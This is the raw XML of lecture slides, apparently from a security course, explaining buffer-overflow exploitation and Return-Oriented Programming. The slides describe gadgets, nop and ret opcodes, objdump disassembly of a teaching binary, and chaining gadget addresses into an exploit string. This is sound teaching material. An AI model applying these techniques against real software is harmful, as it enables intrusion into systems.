                          <a:pt x="6888838" y="1042861"/>
                          <a:pt x="6935263" y="1160334"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6981688" y="1277807"/>
                          <a:pt x="6920201" y="1462150"/>
                          <a:pt x="6935263" y="1654465"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6946448" y="1797930"/>
                          <a:pt x="6769918" y="1954799"/>
                          <a:pt x="6604362" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6355689" y="2034516"/>
                          <a:pt x="6141624" y="1982336"/>
                          <a:pt x="5908578" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5675532" y="1988396"/>
                          <a:pt x="5585775" y="1961469"/>
                          <a:pt x="5463733" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5341691" y="2009263"/>
                          <a:pt x="5045651" y="1982000"/>
                          <a:pt x="4893418" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4741185" y="1988732"/>
                          <a:pt x="4528569" y="1964423"/>
                          <a:pt x="4260369" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3992169" y="2006309"/>
                          <a:pt x="3740173" y="1919037"/>
                          <a:pt x="3564585" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3388997" y="2051695"/>
                          <a:pt x="3214625" y="1933243"/>
                          <a:pt x="2931536" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2648447" y="2037489"/>
                          <a:pt x="2418025" y="1962459"/>
                          <a:pt x="2235752" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2053479" y="2008273"/>
                          <a:pt x="1878492" y="1938500"/>
                          <a:pt x="1602703" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1326914" y="2032232"/>
                          <a:pt x="1324345" y="1940296"/>
                          <a:pt x="1157857" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="991369" y="2030436"/>
                          <a:pt x="663276" y="1915413"/>
                          <a:pt x="330901" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="160873" y="1987326"/>
                          <a:pt x="26551" y="1877953"/>
                          <a:pt x="0" y="1654465"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-53031" y="1550113"/>
                          <a:pt x="26345" y="1295024"/>
                          <a:pt x="0" y="1200041"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-26345" y="1105058"/>
                          <a:pt x="2066" y="879660"/>
                          <a:pt x="0" y="785325"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-2066" y="690990"/>
                          <a:pt x="31159" y="533409"/>
                          <a:pt x="0" y="330901"/>
                        </a:cubicBezTo>
                        <a:close/>
                      </a:path>
                      <a:path w="6935263" h="1985366" stroke="0" extrusionOk="0">
                        <a:moveTo>
                          <a:pt x="0" y="330901"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="-21300" y="135010"/>
                          <a:pt x="104468" y="16394"/>
                          <a:pt x="330901" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="666146" y="-49002"/>
                          <a:pt x="718466" y="57821"/>
                          <a:pt x="1026685" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1334904" y="-57821"/>
                          <a:pt x="1422046" y="27094"/>
                          <a:pt x="1534265" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1646484" y="-27094"/>
                          <a:pt x="1770141" y="4968"/>
                          <a:pt x="1979110" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2188080" y="-4968"/>
                          <a:pt x="2424764" y="51257"/>
                          <a:pt x="2612160" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2799556" y="-51257"/>
                          <a:pt x="2934266" y="17839"/>
                          <a:pt x="3119740" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3305214" y="-17839"/>
                          <a:pt x="3613300" y="56856"/>
                          <a:pt x="3815523" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4017746" y="-56856"/>
                          <a:pt x="4082288" y="11836"/>
                          <a:pt x="4260369" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4438450" y="-11836"/>
                          <a:pt x="4670901" y="69038"/>
                          <a:pt x="4956153" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5241405" y="-69038"/>
                          <a:pt x="5148681" y="272"/>
                          <a:pt x="5338264" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5527847" y="-272"/>
                          <a:pt x="5700670" y="9430"/>
                          <a:pt x="5908578" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6116486" y="-9430"/>
                          <a:pt x="6349684" y="52316"/>
                          <a:pt x="6604362" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6817994" y="-30515"/>
                          <a:pt x="6976625" y="121478"/>
                          <a:pt x="6935263" y="330901"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6963233" y="517036"/>
                          <a:pt x="6925117" y="555805"/>
                          <a:pt x="6935263" y="772089"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6945409" y="988373"/>
                          <a:pt x="6932057" y="1031670"/>
                          <a:pt x="6935263" y="1186806"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6938469" y="1341942"/>
                          <a:pt x="6881326" y="1553025"/>
                          <a:pt x="6935263" y="1654465"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6922445" y="1811088"/>
                          <a:pt x="6790431" y="1940495"/>
                          <a:pt x="6604362" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6397626" y="2010181"/>
                          <a:pt x="6225864" y="1933133"/>
                          <a:pt x="5971313" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5716762" y="2037599"/>
                          <a:pt x="5670373" y="1941892"/>
                          <a:pt x="5526467" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="5382561" y="2028840"/>
                          <a:pt x="5097762" y="1911954"/>
                          <a:pt x="4830683" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4563604" y="2058778"/>
                          <a:pt x="4393649" y="1934127"/>
                          <a:pt x="4260369" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="4127089" y="2036605"/>
                          <a:pt x="3986644" y="1944342"/>
                          <a:pt x="3815523" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3644402" y="2026390"/>
                          <a:pt x="3482736" y="1948031"/>
                          <a:pt x="3245209" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3007682" y="2022701"/>
                          <a:pt x="2995311" y="1978616"/>
                          <a:pt x="2863098" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2730885" y="1992116"/>
                          <a:pt x="2642494" y="1942004"/>
                          <a:pt x="2480987" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2319480" y="2028728"/>
                          <a:pt x="2193233" y="1926884"/>
                          <a:pt x="1910673" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1628113" y="2043848"/>
                          <a:pt x="1622411" y="1985023"/>
                          <a:pt x="1465827" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1309243" y="1985709"/>
                          <a:pt x="973313" y="1981109"/>
                          <a:pt x="832778" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="692243" y="1989623"/>
                          <a:pt x="520796" y="1972351"/>
                          <a:pt x="330901" y="1985366"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="141759" y="2005287"/>
                          <a:pt x="-6142" y="1817876"/>
                          <a:pt x="0" y="1654465"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-37043" y="1465497"/>
                          <a:pt x="48882" y="1354599"/>
                          <a:pt x="0" y="1213277"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-48882" y="1071955"/>
                          <a:pt x="20055" y="950395"/>
                          <a:pt x="0" y="798560"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="-20055" y="646725"/>
                          <a:pt x="13033" y="517708"/>
                          <a:pt x="0" y="33090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hH</a:t>
            </a:r>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Program received signal SIGSEGV, Segmentation fault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x00007fffffffdff8 in ?? ()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381763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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>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vertic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DFDFAB-5CC7-8440-B98D-438DBDB6BA02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Counter-countermeasure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return-Oriented Programming (ROP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5921A6A-E31F-374E-B7A3-57FC40D4D188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Marking stack as non-executable does not prevent an attacker from changing the return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return address can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> memory address with the “executable” bit set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(note: cannot overcome stack canary)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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C56FF9C6-5FD4-BC46-92FA-2EA92D86F06F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571749" y="2672785"/>
            <a:ext cx="7048502" cy="15124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a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hello, World!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Did not return to caller! (insert maniacal laugh here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129135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BCEC44-FC52-FF42-830D-001EDFA6FF1E}"/>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4C4A10F6-AEB6-5445-8B38-6F4B34C9B3D0}"/>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6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F8478B1-4538-8C43-84C3-DF07D6BF8A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return-Oriented Programming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B26C84A-86F8-064E-A6F5-4054C3FB8A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3428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341453-393F-7D4E-B67C-8C7F29FF98F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ROP Concept</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722B8995-78C2-4F4B-A11A-011D793A59C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If attacker cannot inject new code, then use existing code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code from application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code from libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: code of the form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful instruction(s), 0+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1597025" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x86:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0x90	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0xC3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	other multi-byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-equivalents exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="1597025" algn="l"/>
                <a:tab pos="4332288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ARM:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0xD503201F	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0xD65F0000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Construct exploit string with gadgets’ addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After each gadget executes, “return” to next gadget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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A026DF97-4671-4040-BED1-D61B7E103059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10632621" y="376819"/>
            <a:ext cx="1469984" cy="6191750"/>
            <a:chOff x="10632621" y="376819"/>
            <a:chExt cx="1469984" cy="6191750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22BCD516-F364-664A-A0F5-78B6A8DA4344}"/>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2" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1309FD96-BF44-8649-838A-FA648F175A9A}"/>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Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95A616AD-AAF3-6F47-87AE-D8853C7132BB}"/>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14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69EE38D2-9853-2343-AA8D-F6883F87DE9C}"/>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0DB1BC87-5400-F248-93CA-2FB0F1A2DB63}"/>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6" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF94B01-ECD4-0347-A455-BA3034AA4009}"/>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17" name="Straight Arrow Connector 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6307F30D-6B32-8444-93D1-A4725DCE1CC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="14"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Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2B388F-F386-C742-9147-A80737EC8496}"/>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19" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E3A8F3B-52D8-AE45-AA1B-40CD1442757C}"/>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20" name="Straight Arrow Connector 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77379779-9538-7840-9338-6411CF70E21B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="14"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CEB325-0E54-9F40-ACA3-82B0BF431BF9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12"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2172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Gadget Sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9D057C-3B77-B64A-9271-9EA9651F74BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tail end of existing functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFD1C857-52D9-8242-99D4-0EA9143557F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6773524" y="1964809"/>
            <a:ext cx="2283510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -d has-target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78440AE-6EA5-3F44-8F79-A0BFEB6E1F8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2334141"/>
            <a:ext cx="8218834" cy="12059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0000000000400540 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>deregister_tm_clones</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400568:       5d                      pop    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rbp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400569: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2" name="Rounded Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D96A1CB8-2278-2C4B-A170-E73D77ECC77A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4134185"/>
            <a:ext cx="8218834" cy="15124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0000000000400657 &lt;main&gt;:</a:t>
            </a:r>
          </a:p>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400665:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40066a:       48 83 c4 08             add    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40066e: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287253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Gadget Sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9D057C-3B77-B64A-9271-9EA9651F74BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Re-purposed bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
